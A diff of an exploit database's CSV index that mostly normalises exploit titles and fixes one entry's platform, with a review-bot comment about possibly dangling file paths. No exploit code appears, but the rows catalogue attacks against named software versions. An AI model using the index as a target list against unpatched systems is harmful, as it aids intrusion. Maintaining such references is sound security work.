 15944,platforms/linux/local/15944.c,"Linux Kernel < 2.6.34 - CAP_SYS_ADMIN x86 & x64 - Local Privilege Escalation Exploit (2)",2011-01-08,"Joe Sylve",linux,local,0
 15945,platforms/php/webapps/15945.txt,"Zwii 2.1.1 - Remote File Inclusion Vulnerbility",2011-01-08,"Abdi Mohamed",php,webapps,0
 16123,platforms/hardware/remote/16123.txt,"Comcast DOCSIS 3.0 Business Gateways Multiple Vulnerabilities",2011-02-06,"Trustwave's SpiderLabs",hardware,remote,0
@@ -14165,7 +14166,7 @@ id,file,description,date,author,platform,type,port
 16359,platforms/windows/remote/16359.rb,"Microsoft WINS Service Memory Overwrite",2010-09-20,metasploit,windows,remote,0
 16360,platforms/windows/remote/16360.rb,"Microsoft Windows SMB Relay Code Execution",2010-09-21,metasploit,windows,remote,0
 16361,platforms/windows/remote/16361.rb,"Microsoft Print Spooler Service - Impersonation Vulnerability (MS10-061)",2011-02-17,metasploit,windows,remote,0
-16362,platforms/windows/remote/16362.rb,"Microsoft Windows Server - Service Relative Path Stack Corruption (MS08-067)",2011-01-21,metasploit,windows,remote,0
+16362,platforms/windows/remote/16362.rb,"Microsoft Windows Server - Service Relative Path Stack Corruption (MS08-067)",2011-01-21,metasploit,windows,remote,0
 16363,platforms/windows/remote/16363.rb,"Microsoft Windows SRV2.SYS SMB Negotiate ProcessID Function Table Dereference",2010-07-03,metasploit,windows,remote,0
 16364,platforms/windows/remote/16364.rb,"Microsoft RRAS Service Overflow",2010-05-09,metasploit,windows,remote,0
 16365,platforms/windows/dos/16365.rb,"Microsoft Plug and Play Service Overflow",2010-08-30,metasploit,windows,dos,0
@@ -14976,7 +14977,7 @@ id,file,description,date,author,platform,type,port
 17204,platforms/php/webapps/17204.txt,"DynMedia Pro Web CMS 4.0 - Local File Disclosure",2011-04-22,Mbah_Semar,php,webapps,0
 17205,platforms/php/webapps/17205.txt,"4images 1.7.9 - Multiple Vulnerabilities",2011-04-22,"High-Tech Bridge SA",php,webapps,0
 17206,platforms/php/webapps/17206.txt,"Realmarketing CMS - Multiple SQL Injection Vulnerabilities",2011-04-22,^Xecuti0N3r,php,webapps,0
-17207,platforms/php/webapps/17207.txt,"WordPress Plugin ajax category dropdown 0.1.5 - Multiple Vulnerabilities",2011-04-22,"High-Tech Bridge SA",php,webapps,0
+17207,platforms/php/webapps/17207.txt,"WordPress Plugin ajax category dropdown 0.1.5 - Multiple Vulnerabilities",2011-04-22,"High-Tech Bridge SA",php,webapps,0
 17211,platforms/php/webapps/17211.txt,"mySeatXT 0.1781 SQL Injection Vulnerability",2011-04-25,"AutoSec Tools",php,webapps,0
 17212,platforms/php/webapps/17212.txt,"OrangeHRM 2.6.3 - (PluginController.php) Local File Inclusion Vulnerability",2011-04-25,"AutoSec Tools",php,webapps,0
 17213,platforms/php/webapps/17213.txt,"phpmychat plus 1.93 - Multiple Vulnerabilities",2011-04-25,"AutoSec Tools",php,webapps,0
@@ -15933,7 +15934,7 @@ id,file,description,date,author,platform,type,port
 18975,platforms/php/webapps/18975.rb,"Log1 CMS writeInfo() PHP Code Injection",2012-06-03,metasploit,php,webapps,0
 18976,platforms/php/dos/18976.php,"PHP 5.3.10 - spl_autoload() Local Denial of Service",2012-06-03,"Yakir Wizman",php,dos,0
 18381,platforms/windows/remote/18381.rb,"HP Easy Printer Care XMLCacheMgr Class ActiveX Control Remote Code Execution",2012-01-18,metasploit,windows,remote,0
-18382,platforms/windows/remote/18382.py,"Sysax Multi Server 5.50 Create Folder BOF",2012-01-18,"Craig Freyman",windows,remote,0
+18382,platforms/windows/remote/18382.py,"Sysax Multi Server 5.50 - Create Folder BOF",2012-01-18,"Craig Freyman",windows,remote,0
 18383,platforms/php/webapps/18383.txt,"pGB 2.12 kommentar.php SQL Injection Vulnerability",2012-01-18,3spi0n,php,webapps,0
 18384,platforms/php/webapps/18384.txt,"PhpBridges Blog System members.php SQL Injection",2012-01-18,3spi0n,php,webapps,0
 18385,platforms/php/webapps/18385.txt,"DZCP (deV!L_z Clanportal) Gamebase Addon - SQL Injection Vulnerability",2012-01-18,"Easy Laster",php,webapps,0
@@ -16012,7 +16013,7 @@ id,file,description,date,author,platform,type,port
 18471,platforms/windows/local/18471.c,"TORCS <= 1.3.2 xml Buffer Overflow /SAFESEH evasion",2012-02-08,"Andres Gomez and David Mora",windows,local,0
 18473,platforms/multiple/webapps/18473.txt,"Cyberoam Central Console 2.00.2 - File Include Vulnerability",2012-02-08,Vulnerability-Lab,multiple,webapps,0
 18475,platforms/windows/dos/18475.c,"PeerBlock 1.1 BSOD",2012-02-09,shinnai,windows,dos,0
-18476,platforms/windows/remote/18476.py,"Sysax Multi Server <= 5.52 File Rename BoF RCE (Egghunter)",2012-02-09,"Craig Freyman",windows,remote,0
+18476,platforms/windows/remote/18476.py,"Sysax Multi Server <= 5.52 - File Rename BoF RCE (Egghunter)",2012-02-09,"Craig Freyman",windows,remote,0
 18478,platforms/windows/remote/18478.rb,"Citrix Provisioning Services 5.6 SP1 - Streamprocess Opcode 0x40020000 Buffer Overflow",2012-02-10,metasploit,windows,remote,0
 18479,platforms/windows/remote/18479.rb,"Adobe Flash Player MP4 SequenceParameterSetNALUnit Buffer Overflow",2012-02-10,metasploit,windows,remote,0
 18480,platforms/php/webapps/18480.txt,"Dolibarr CMS 3.2.0 - Alpha - File Include Vulnerabilities",2012-02-10,Vulnerability-Lab,php,webapps,0
@@ -16062,8 +16063,8 @@ id,file,description,date,author,platform,type,port
 18547,platforms/windows/local/18547.rb,"DJ Studio Pro 5.1 - (.pls) Stack Buffer Overflow",2012-03-02,metasploit,windows,local,0
 18531,platforms/windows/remote/18531.html,"Mozilla Firefox 4.0.1 - Array.reduceRight() Exploit",2012-02-27,pa_kt,windows,remote,0
 18533,platforms/windows/local/18533.txt,"Socusoft Photo 2 Video 8.05 - Buffer Overflow Vulnerability",2012-02-27,Vulnerability-Lab,windows,local,0
-18534,platforms/windows/remote/18534.py,"Sysax Multi Server 5.53 SFTP Post Auth SEH Exploit",2012-02-27,"Craig Freyman",windows,remote,0
-18535,platforms/windows/remote/18535.py,"Sysax <= 5.53 SSH Username BoF Pre Auth RCE (Egghunter)",2012-02-27,"Craig Freyman",windows,remote,0
+18534,platforms/windows/remote/18534.py,"Sysax Multi Server 5.53 - SFTP Post Auth SEH Exploit",2012-02-27,"Craig Freyman",windows,remote,0
+18535,platforms/windows/remote/18535.py,"Sysax <= 5.53 - SSH Username BoF Pre Auth RCE (Egghunter)",2012-02-27,"Craig Freyman",windows,remote,0
 18536,platforms/php/webapps/18536.txt,"WebfolioCMS <= 1.1.4 - CSRF (Add Admin/Modify Pages)",2012-02-28,"Ivano Binetti",php,webapps,0
 18702,platforms/php/webapps/18702.txt,"Hotel Booking Portal - SQL Injection",2012-04-04,"Mark Stanislav",php,webapps,0
 18538,platforms/windows/remote/18538.rb,"ASUS Net4Switch - ipswcom.dll ActiveX Stack Buffer Overflow",2012-02-29,metasploit,windows,remote,0
@@ -16085,7 +16086,7 @@ id,file,description,date,author,platform,type,port
 18554,platforms/php/webapps/18554.txt,"Timesheet Next Gen 1.5.2 - Multiple SQLi",2012-03-03,G13,php,webapps,0
 18555,platforms/windows/remote/18555.txt,"FlashFXP 4.1.8.1701 - Buffer Overflow Vulnerability",2012-03-03,Vulnerability-Lab,windows,remote,0
 18556,platforms/php/webapps/18556.txt,"Endian UTM Firewall 2.4.x & 2.5.0 - Multiple Web Vulnerabilities",2012-03-03,Vulnerability-Lab,php,webapps,0
-18557,platforms/windows/remote/18557.rb,"Sysax 5.53 SSH Username Buffer Overflow (Metasploit)",2012-03-04,metasploit,windows,remote,0
+18557,platforms/windows/remote/18557.rb,"Sysax 5.53 - SSH Username Buffer Overflow (Metasploit)",2012-03-04,metasploit,windows,remote,0
 18558,platforms/php/webapps/18558.txt,"DZCP (deV!L_z Clanportal) Witze Addon 0.9 - SQL Injection Vulnerability",2012-03-04,"Easy Laster",php,webapps,0
 18559,platforms/php/webapps/18559.txt,"AneCMS 2e2c583 - LFI Exploit",2012-03-04,"I2sec-Jong Hwan Park",php,webapps,0
 18566,platforms/asp/webapps/18566.txt,"Iciniti Store - SQL Injection",2012-03-07,"Sense of Security",asp,webapps,0
@@ -16164,7 +16165,7 @@ id,file,description,date,author,platform,type,port
 18655,platforms/php/webapps/18655.php,"phpFox <= 3.0.1 (ajax.php) Remote Command Execution Exploit",2012-03-23,EgiX,php,webapps,0
 18656,platforms/windows/local/18656.pl,"mmPlayer 2.2 - (.m3u) Local Buffer Overflow Exploit (SEH)",2012-03-23,"RjRjh Hack3r",windows,local,0
 18657,platforms/windows/local/18657.pl,"mmPlayer 2.2 - (.ppl) Local Buffer Overflow Exploit (SEH)",2012-03-23,"RjRjh Hack3r",windows,local,0
-18695,platforms/windows/remote/18695.py,"sysax <= 5.57 - Directory Traversal",2012-04-03,"Craig Freyman",windows,remote,0
+18695,platforms/windows/remote/18695.py,"Sysax <= 5.57 - Directory Traversal",2012-04-03,"Craig Freyman",windows,remote,0
 18658,platforms/windows/remote/18658.rb,"Ricoh DC DL-10 SR10 FTP USER Command Buffer Overflow_",2012-03-24,metasploit,windows,remote,0
 18659,platforms/php/webapps/18659.rb,"FreePBX 2.10.0 / 2.9.0 callmenum Remote Code Execution",2012-03-24,metasploit,php,webapps,0
 18660,platforms/php/webapps/18660.txt,"RIPS <= 0.53 - Multiple Local File Inclusion Vulnerabilities",2012-03-24,localh0t,php,webapps,0
@@ -16376,7 +16377,7 @@ id,file,description,date,author,platform,type,port
 18935,platforms/php/webapps/18935.txt,"b2ePms 1.0 - Multiple SQLi Vulnerabilities",2012-05-27,loneferret,php,webapps,0
 18942,platforms/linux/remote/18942.rb,"Symantec Web Gateway 5.0.2.8 Command Execution Vulnerability",2012-05-28,metasploit,linux,remote,0
 18937,platforms/php/webapps/18937.txt,"PBBoard 2.1.4 - Local File Inclusion",2012-05-28,n4ss1m,php,webapps,0
-18981,platforms/windows/local/18981.txt,"Sysax <= 5.60 Create SSL Certificate Buffer Overflow",2012-06-04,"Craig Freyman",windows,local,0
+18981,platforms/windows/local/18981.txt,"Sysax <= 5.60 - Create SSL Certificate Buffer Overflow",2012-06-04,"Craig Freyman",windows,local,0
 18944,platforms/php/webapps/18944.txt,"PHP Volunteer Management System 1.0.2 - Multiple SQL Injection Vulnerabilities",2012-05-28,loneferret,php,webapps,0
 18945,platforms/windows/dos/18945.txt,"WinRadius Server 2009 - Denial of Service",2012-05-29,demonalex,windows,dos,0
 18946,platforms/windows/dos/18946.txt,"Tftpd32 DNS Server 4.00 - Denial of Service",2012-05-29,demonalex,windows,dos,0
@@ -16683,7 +16684,7 @@ id,file,description,date,author,platform,type,port
 19290,platforms/multiple/dos/19290.txt,"Airlock WAF 4.2.4 Overlong UTF-8 Sequence Bypass",2012-06-19,"SEC Consult",multiple,dos,0
 19291,platforms/windows/remote/19291.rb,"EZHomeTech EzServer <= 6.4.017 - Stack Buffer Overflow Vulnerability",2012-06-19,metasploit,windows,remote,0
 19292,platforms/php/webapps/19292.txt,"iBoutique eCommerce 4.0 - Multiple Web Vulnerabilites",2012-06-19,Vulnerability-Lab,php,webapps,0
-19293,platforms/windows/local/19293.py,"Sysax <= 5.62 Admin Interface Local Buffer Overflow",2012-06-20,"Craig Freyman",windows,local,0
+19293,platforms/windows/local/19293.py,"Sysax <= 5.62 - Admin Interface Local Buffer Overflow",2012-06-20,"Craig Freyman",windows,local,0
 19294,platforms/php/webapps/19294.txt,"WordPress Schreikasten 0.14.13 - XSS",2012-06-20,"Henry Hoggard",php,webapps,0
 19295,platforms/windows/remote/19295.rb,"Adobe Flash Player AVM Verification Logic Array Indexing Code Execution",2012-06-20,metasploit,windows,remote,0
 19601,platforms/windows/remote/19601.txt,"etype eserv 2.50 - Directory Traversal Vulnerability",1999-11-04,"Ussr Labs",windows,remote,0
@@ -17998,7 +17999,6 @@ id,file,description,date,author,platform,type,port
 20673,platforms/php/webapps/20673.txt,"YourArcadeScript 2.4 (index.php id parameter) SQL Injection",2012-08-20,DaOne,php,webapps,0
 20713,platforms/php/webapps/20713.rb,"XODA 0.4.5 - Arbitrary PHP File Upload Vulnerability",2012-08-22,metasploit,php,webapps,0
 20675,platforms/php/webapps/20675.py,"uebimiau webmail 2.7.2 - Stored XSS",2012-08-20,"Shai rod",php,webapps,0
-20676,platforms/windows/remote/20676.rb,"Sysax Multi-Server 5.64 Create Folder Buffer Overflow",2012-08-20,"Matt Andreko",windows,remote,0
 20677,platforms/windows/webapps/20677.txt,"IOServer _Root Directory_ Trailing Backslash Multiple Vulnerabilities",2012-08-20,hinge,windows,webapps,0
 20678,platforms/unix/local/20678.c,"Rob Malda ASCDC 0.3 - Buffer Overflow Vulnerability (1)",2001-03-08,anonymous,unix,local,0
 20679,platforms/unix/local/20679.c,"Rob Malda ASCDC 0.3 - Buffer Overflow Vulnerability (2)",2001-03-08,"the itch",unix,local,0
@@ -18022,7 +18022,7 @@ id,file,description,date,author,platform,type,port
 20697,platforms/unix/local/20697.c,"DG/UX 4.20 lpsched Long Error Message Buffer Overflow Vulnerability",2001-03-19,"Luciano Rocha",unix,local,0
 20707,platforms/linux/webapps/20707.py,"Symantec Web Gateway <= 5.0.3.18 - Arbitrary Password Change",2012-08-21,Kc57,linux,webapps,0
 20708,platforms/php/webapps/20708.txt,"Clipbucket 2.5 - Blind SQLi Vulnerability",2012-08-21,loneferret,php,webapps,0
-20702,platforms/windows/remote/20702.rb,"Sysax Multi Server 5.64 Create Folder Buffer Overflow",2012-08-21,metasploit,windows,remote,0
+20702,platforms/windows/remote/20702.rb,"Sysax Multi Server 5.64 - Create Folder Buffer Overflow",2012-08-21,metasploit,windows,remote,0
 20703,platforms/php/webapps/20703.txt,"XODA Document Management System 0.4.5 - XSS & Arbitrary File Upload",2012-08-21,"Shai rod",php,webapps,0
 20714,platforms/cgi/remote/20714.txt,"anaconda clipper 3.3 - Directory Traversal Vulnerability",2001-03-27,"UkR hacking team",cgi,remote,0
 20715,platforms/solaris/local/20715.txt,"Junsoft JSparm 4.0 Logging Output File Vulnerability",2001-03-23,KimYongJun,solaris,local,0
@@ -18218,7 +18218,7 @@ id,file,description,date,author,platform,type,port
 20912,platforms/windows/remote/20912.txt,"Trend Micro InterScan VirusWall for Windows NT 3.51 Configurations Modification Vulnerability",2001-06-12,"SNS Advisory",windows,remote,0
 20913,platforms/php/webapps/20913.txt,"Disqus Blog Comments Blind SQL Injection Vulnerability",2012-08-29,Spy_w4r3,php,webapps,0
 20914,platforms/cgi/remote/20914.pl,"cgiCentral WebStore 400 Administrator Authentication Bypass Vulnerability",2001-05-06,"Igor Dobrovitski",cgi,remote,0
-20915,platforms/windows/local/20915.py,"ActFax 4.31 - Local Privilege Escalation Exploit",2012-08-29,"Craig Freyman",windows,local,0
+20915,platforms/windows/local/20915.py,"ActFax Server 4.31 Build 0225 - Local Privilege Escalation Exploit",2012-08-29,"Craig Freyman",windows,local,0
 20916,platforms/cgi/remote/20916.pl,"cgiCentral WebStore 400 - Arbitrary Command Execution Vulnerability",2001-05-06,"Igor Dobrovitski",cgi,remote,0
 20917,platforms/windows/dos/20917.txt,"Winlog Lite SCADA HMI system SEH 0verwrite Vulnerability",2012-08-29,Ciph3r,windows,dos,0
 20918,platforms/php/webapps/20918.txt,"WordPress HD Webplayer 1.1 - SQL Injection Vulnerability",2012-08-29,JoinSe7en,php,webapps,0
@@ -23511,7 +23511,7 @@ id,file,description,date,author,platform,type,port
 26374,platforms/windows/remote/26374.txt,"Xerver 4.17 Single Dot File Request Source Disclosure",2005-10-19,"Ziv Kamir",windows,remote,0
 26375,platforms/windows/remote/26375.txt,"Xerver 4.17 - Forced Directory Listing",2005-10-19,"Ziv Kamir",windows,remote,0
 26376,platforms/windows/remote/26376.txt,"Xerver 4.17 Server URI Null Character XSS",2005-10-19,"Ziv Kamir",windows,remote,0
-26377,platforms/php/webapps/26377.txt,"PHP-Nuke Search Module - Modules.PHP Remote Directory Traversal Vulnerability",2005-10-19,sp3x@securityreason.com,php,webapps,0
+26377,platforms/php/webapps/26377.txt,"PHP-Nuke Search Module - Modules.PHP Remote Directory Traversal Vulnerability",2005-10-19,sp3x@securityreason.com,php,webapps,0
 26378,platforms/php/webapps/26378.txt,"Chipmunk Forum newtopic.php forumID Parameter XSS",2005-10-20,"Alireza Hassani",php,webapps,0
 26379,platforms/php/webapps/26379.txt,"Chipmunk Forum quote.php forumID Parameter XSS",2005-10-20,"Alireza Hassani",php,webapps,0
 26380,platforms/php/webapps/26380.txt,"Chipmunk Forum recommend.php ID Parameter XSS",2005-10-20,"Alireza Hassani",php,webapps,0
@@ -33180,9 +33180,9 @@ id,file,description,date,author,platform,type,port
 36766,platforms/php/webapps/36766.txt,"Powie pFile 1.02 pfile/file.php id Parameter SQL Injection",2012-02-13,indoushka,php,webapps,0
 36767,platforms/hardware/remote/36767.html,"D-Link DAP-1150 1.2.94 Cross Site Request Forgery Vulnerability",2012-02-13,MustLive,hardware,remote,0
 36768,platforms/php/webapps/36768.txt,"ProWiki 'id' Parameter Cross Site Scripting Vulnerability",2012-02-10,sonyy,php,webapps,0
-36769,platforms/php/webapps/36769.txt,"STHS v2 Web Portal prospects.php team Parameter SQL Injection",2012-02-13,"Liyan Oz",php,webapps,0
-36770,platforms/php/webapps/36770.txt,"STHS v2 Web Portal prospect.php team Parameter SQL Injection",2012-02-13,"Liyan Oz",php,webapps,0
-36771,platforms/php/webapps/36771.txt,"STHS v2 Web Portal team.php team Parameter SQL Injection",2012-02-13,"Liyan Oz",php,webapps,0
+36769,platforms/php/webapps/36769.txt,"STHS v2 Web Portal - prospects.php team Parameter SQL Injection",2012-02-13,"Liyan Oz",php,webapps,0
+36770,platforms/php/webapps/36770.txt,"STHS v2 Web Portal - prospect.php team Parameter SQL Injection",2012-02-13,"Liyan Oz",php,webapps,0
+36771,platforms/php/webapps/36771.txt,"STHS v2 Web Portal - team.php team Parameter SQL Injection",2012-02-13,"Liyan Oz",php,webapps,0
 36772,platforms/cgi/webapps/36772.txt,"EditWrxLite CMS 'wrx.cgi' Remote Command Execution Vulnerability",2012-02-13,chippy1337,cgi,webapps,0
 36773,platforms/windows/dos/36773.c,"Microsoft Window - HTTP.sys PoC (MS15-034)",2015-04-15,rhcp011235,windows,dos,0
 36774,platforms/php/webapps/36774.txt,"WordPress MiwoFTP Plugin 1.0.5 - Arbitrary File Download Exploit",2015-04-15,"Necmettin COSKUN",php,webapps,0
@@ -33852,7 +33852,7 @@ id,file,description,date,author,platform,type,port
 37489,platforms/php/webapps/37489.txt,"MGB Multiple Cross Site Scripting and SQL Injection Vulnerabilities",2012-07-09,"Stefan Schurtz",php,webapps,0
 37546,platforms/linux/dos/37546.pl,"File Roller v3.4.1 - DoS PoC",2015-07-09,Arsyntex,linux,dos,0
 37563,platforms/php/webapps/37563.html,"WordPress G-Lock Double Opt-in Manager Plugin SQL Injection Vulnerability",2012-08-01,BEASTIAN,php,webapps,0
-37492,platforms/ios/webapps/37492.txt,"WK UDID v1.0.1 iOS - Command Inject Vulnerability",2015-07-05,Vulnerability-Lab,ios,webapps,0
+37492,platforms/ios/webapps/37492.txt,"WK UDID 1.0.1 iOS - Command Inject Vulnerability",2015-07-05,Vulnerability-Lab,ios,webapps,0
 37534,platforms/php/webapps/37534.txt,"WordPress Easy2Map Plugin 1.24 - SQL Injection",2015-07-08,"Larry W. Cashdollar",php,webapps,80
 37535,platforms/windows/local/37535.txt,"Blueberry Express 5.9.0.3678 - SEH Buffer Overflow",2015-07-08,Vulnerability-Lab,windows,local,0
 37494,platforms/php/webapps/37494.txt,"WordPress S3Bubble Cloud Video With Adverts & Analytics 0.7 - Arbitrary File Download",2015-07-05,CrashBandicot,php,webapps,0
@@ -34025,7 +34025,7 @@ id,file,description,date,author,platform,type,port
 37683,platforms/php/webapps/37683.txt,"Phorum 5.2.18 Multiple Cross Site Scripting Vulnerabilities",2012-08-29,"High-Tech Bridge",php,webapps,0
 37684,platforms/php/webapps/37684.html,"PrestaShop <= 1.4.7 Multiple Cross Site Scripting Vulnerabilities",2012-08-29,"High-Tech Bridge",php,webapps,0
 37685,platforms/xml/dos/37685.txt,"squidGuard 1.4 - Long URL Handling Remote Denial of Service Vulnerability",2012-08-30,"Stefan Bauer",xml,dos,0
-37686,platforms/multiple/webapps/37686.txt,"Hawkeye-G v3.0.1.4912 CSRF Vulnerability",2015-07-24,hyp3rlinx,multiple,webapps,0
+37686,platforms/multiple/webapps/37686.txt,"Hawkeye-G 3.0.1.4912 - CSRF Vulnerability",2015-07-24,hyp3rlinx,multiple,webapps,0
 37687,platforms/php/webapps/37687.txt,"TomatoCart 'example_form.ajax.php' Cross Site Scripting Vulnerability",2012-08-30,HauntIT,php,webapps,0
 37689,platforms/asp/webapps/37689.txt,"XM Forum 'search.asp' SQL Injection Vulnerability",2012-08-30,Crim3R,asp,webapps,0
 37690,platforms/php/webapps/37690.txt,"Crowbar 'file' Parameter Multiple Cross Site Scripting Vulnerabilities",2012-08-30,"Matthias Weckbecker",php,webapps,0
@@ -34038,7 +34038,7 @@ id,file,description,date,author,platform,type,port
 37697,platforms/php/webapps/37697.txt,"phpFox 3.0.1 'ajax.php' Multiple Cross Site Scripting Vulnerabilities",2012-09-04,Crim3R,php,webapps,0
 37698,platforms/php/webapps/37698.txt,"Kayako Fusion 'download.php' Cross Site Scripting Vulnerability",2012-09-05,"High-Tech Bridge",php,webapps,0
 37699,platforms/windows/local/37699.py,"Foxit Reader - PNG Conversion Parsing tEXt Chunk Arbitrary Code Execution",2015-07-27,"Sascha Schirra",windows,local,0
-37700,platforms/multiple/webapps/37700.txt,"Hawkeye-G v3.0.1.4912 Persistent XSS & Information Leakage",2015-07-27,hyp3rlinx,multiple,webapps,0
+37700,platforms/multiple/webapps/37700.txt,"Hawkeye-G 3.0.1.4912 - Persistent XSS & Information Leakage",2015-07-27,hyp3rlinx,multiple,webapps,0
 37706,platforms/linux/dos/37706.txt,"Libuser Library - Multiple Vulnerabilities",2015-07-27,"Qualys Corporation",linux,dos,0
 37737,platforms/windows/local/37737.rb,"Heroes of Might and Magic III .h3m Map file Buffer Overflow",2015-08-07,metasploit,windows,local,0
 37825,platforms/osx/local/37825.txt,"OS X 10.10.5 - XNU Local Privilege Escalation",2015-08-18,kpwn,osx,local,0
@@ -34238,7 +34238,7 @@ id,file,description,date,author,platform,type,port
 37895,platforms/win64/shellcode/37895.asm,"Win2003 x64 - Token Stealing shellcode - 59 bytes",2015-08-20,"Fitzl Csaba",win64,shellcode,0
 37896,platforms/php/webapps/37896.txt,"WordPress ABC Test Plugin 'id' Parameter Cross Site Scripting Vulnerability",2012-09-26,"Scott Herbert",php,webapps,0
 37897,platforms/linux/dos/37897.html,"Midori Browser 0.3.2 Denial of Service Vulnerability",2012-09-27,"Ryuzaki Lawlet",linux,dos,0
-37898,platforms/windows/local/37898.py,"Reaver Pro Local Privilege Escalation Vulnerability",2012-09-30,infodox,windows,local,0
+37898,platforms/linux/local/37898.py,"Reaver Pro - Local Privilege Escalation Vulnerability",2012-09-30,infodox,linux,local,0
 37899,platforms/php/webapps/37899.txt,"Switchvox Multiple HTML Injection Vulnerabilities",2012-10-02,"Ibrahim El-Sayed",php,webapps,0
 37900,platforms/multiple/remote/37900.txt,"IBM Lotus Notes Traveler 8.5.1.x Multiple Input Validation Vulnerabilities",2012-09-28,MustLive,multiple,remote,0
 37901,platforms/php/webapps/37901.txt,"AlamFifa CMS 'user_name_cookie' Parameter SQL Injection Vulnerability",2012-09-30,L0n3ly-H34rT,php,webapps,0
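Review bot: The new 37898 row changes the file column from platforms/windows/local/37898.py to platforms/linux/local/37898.py, but no rename or delete/add hunk for that file appears in the visible part of this diff, so unless the move happens in a hunk outside this view the index now points at a path that does not exist. The same question applies to the 20676 row removed in the earlier -17998 hunk: the index entry goes away, but a deletion of platforms/windows/remote/20676.rb is not visible here. Anything that resolves entries by the file column (searchsploit's mirror/copy mode, link checkers) would fail on a dangling path, so it is worth confirming the matching `git mv` and `git rm` are part of this commit.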
@@ -34336,7 +34336,7 @@ id,file,description,date,author,platform,type,port
 38011,platforms/php/webapps/38011.txt,"OrangeHRM 'sortField' Parameter SQL Injection Vulnerability",2012-11-07,"High-Tech Bridge",php,webapps,0
 38012,platforms/php/webapps/38012.txt,"WordPress FLV Player Plugin 'id' Parameter SQL Injection Vulnerability",2012-11-07,"Ashiyane Digital Security Team",php,webapps,0
 38013,platforms/windows/remote/38013.py,"PCMan FTP Server 2.0.7 - RENAME Command Buffer Overflow",2015-08-29,Koby,windows,remote,21
-38014,platforms/windows/dos/38014.py,"Sysax Multi Server 6.40 SSH Component Denial of Service",2015-08-29,3unnym00n,windows,dos,22
+38014,platforms/windows/dos/38014.py,"Sysax Multi Server 6.40 - SSH Component Denial of Service",2015-08-29,3unnym00n,windows,dos,22
 38015,platforms/php/webapps/38015.txt,"AR Web Content Manager (AWCM) cookie_gen.php Arbitrary Cookie Generation Weakness",2012-11-08,"Sooel Son",php,webapps,0
 38016,platforms/multiple/webapps/38016.txt,"ESRI ArcGIS for Server 'where' Form Field SQL Injection Vulnerability",2012-11-09,anonymous,multiple,webapps,0
 38017,platforms/php/webapps/38017.txt,"WordPress Kakao Theme 'ID' Parameter SQL Injection Vulnerability",2012-11-09,sil3nt,php,webapps,0
@@ -34493,7 +34493,7 @@ id,file,description,date,author,platform,type,port
 38184,platforms/php/webapps/38184.txt,"TinyBrowser /tiny_mce/plugins/tinybrowser/edit.php Empty type Parameter Directory Listing",2013-01-09,MustLive,php,webapps,0
 38185,platforms/windows/local/38185.txt,"Total Commander 8.52 - SEH Overwrite Buffer Overflow",2015-09-15,Un_N0n,windows,local,0
 38186,platforms/hardware/remote/38186.txt,"TP-Link NC200/NC220 Cloud Camera 300Mbps Wi-Fi - Hard-Coded Credentials",2015-09-15,LiquidWorm,hardware,remote,0
-38187,platforms/php/webapps/38187.txt,"WordPress CP Reservation Calendar Plugin 1.1.6 - SQL Injection",2015-09-15,"i0akiN SEC-LABORATORY",php,webapps,80
+38187,platforms/php/webapps/38187.txt,"WordPress CP Reservation Calendar Plugin 1.1.6 - SQL Injection",2015-09-15,"i0akiN SEC-LABORATORY",php,webapps,80
 38188,platforms/jsp/webapps/38188.txt,"Openfire 3.10.2 - Unrestricted File Upload",2015-09-15,hyp3rlinx,jsp,webapps,80
 38189,platforms/jsp/webapps/38189.txt,"Openfire 3.10.2 - Remote File Inclusion",2015-09-15,hyp3rlinx,jsp,webapps,0
 38190,platforms/jsp/webapps/38190.txt,"Openfire 3.10.2 - Privilege Escalation",2015-09-15,hyp3rlinx,jsp,webapps,80
@@ -34599,7 +34599,7 @@ id,file,description,date,author,platform,type,port
 38299,platforms/windows/local/38299.c,"Symantec Encryption Desktop 10 Local Buffer Overflow Privilege Escalation Vulnerability",2012-02-25,"Nikita Tarakanov",windows,local,0
 38300,platforms/php/webapps/38300.txt,"WordPress Audio Player Plugin 'playerID' Parameter Cross Site Scripting Vulnerability",2013-01-31,hiphop,php,webapps,0
 38301,platforms/php/webapps/38301.txt,"WordPress Pinboard Theme 'tab' Parameter Cross Site Scripting Vulnerability",2013-02-09,"Henrique Montenegro",php,webapps,0
-38302,platforms/multiple/remote/38302.rb,"w3tw0rk / Pitbul IRC Bot Remote Code Execution",2015-09-23,metasploit,multiple,remote,6667
+38302,platforms/multiple/remote/38302.rb,"w3tw0rk / Pitbul IRC Bot - Remote Code Execution",2015-09-23,metasploit,multiple,remote,6667
 38303,platforms/osx/local/38303.c,"Cisco AnyConnect 3.1.08009 - Privilege Escalation via DMG Install Script",2015-09-23,"Yorick Koster",osx,local,0
 38304,platforms/php/webapps/38304.py,"SMF (Simple Machine Forum) <= 2.0.10 - Remote Memory Exfiltration Exploit",2015-09-24,"Filippo Roncari",php,webapps,0
 38447,platforms/multiple/local/38447.pl,"libsndfile 1.0.25 - Heap Overflow",2015-10-13,"Marco Romano",multiple,local,0
@@ -34656,7 +34656,7 @@ id,file,description,date,author,platform,type,port
 38357,platforms/linux/local/38357.c,"rpi-update Insecure Temporary File Handling and Security Bypass Vulnerabilities",2013-02-28,Technion,linux,local,0
 38358,platforms/java/webapps/38358.txt,"HP Intelligent Management Center 'topoContent.jsf' Cross Site Scripting Vulnerability",2013-03-04,"Julien Ahrens",java,webapps,0
 38359,platforms/php/webapps/38359.txt,"WordPress Count Per Day Plugin 'daytoshow' Parameter Cross Site Scripting Vulnerability",2013-03-05,alejandr0.m0f0,php,webapps,0
-38360,platforms/osx/local/38360.txt,"Dropbox < 3.3.x - OSX FinderLoadBundle Local Root Exploit",2015-09-30,cenobyte,osx,local,0
+38360,platforms/osx/local/38360.txt,"Dropbox < 3.3.x - OSX FinderLoadBundle Local Root Exploit",2015-09-30,cenobyte,osx,local,0
 38402,platforms/multiple/remote/38402.rb,"Zemra Botnet CnC Web Panel Remote Code Execution",2015-10-05,metasploit,multiple,remote,0
 38401,platforms/windows/remote/38401.rb,"Kaseya VSA uploader.aspx Arbitrary File Upload",2015-10-05,metasploit,windows,remote,0
 38362,platforms/windows/local/38362.py,"MakeSFX.exe 1.44 - Stack Buffer Overflow",2015-09-30,hyp3rlinx,windows,local,0
@@ -34857,7 +34857,7 @@ id,file,description,date,author,platform,type,port
 38571,platforms/php/webapps/38571.txt,"mkCMS 'index.php' Arbitrary PHP Code Execution Vulnerability",2013-06-11,"CWH Underground",php,webapps,0
 38573,platforms/php/webapps/38573.txt,"eBay Magento <= 1.9.2.1 - PHP FPM XML eXternal Entity Injection",2015-10-30,"Dawid Golunski",php,webapps,0
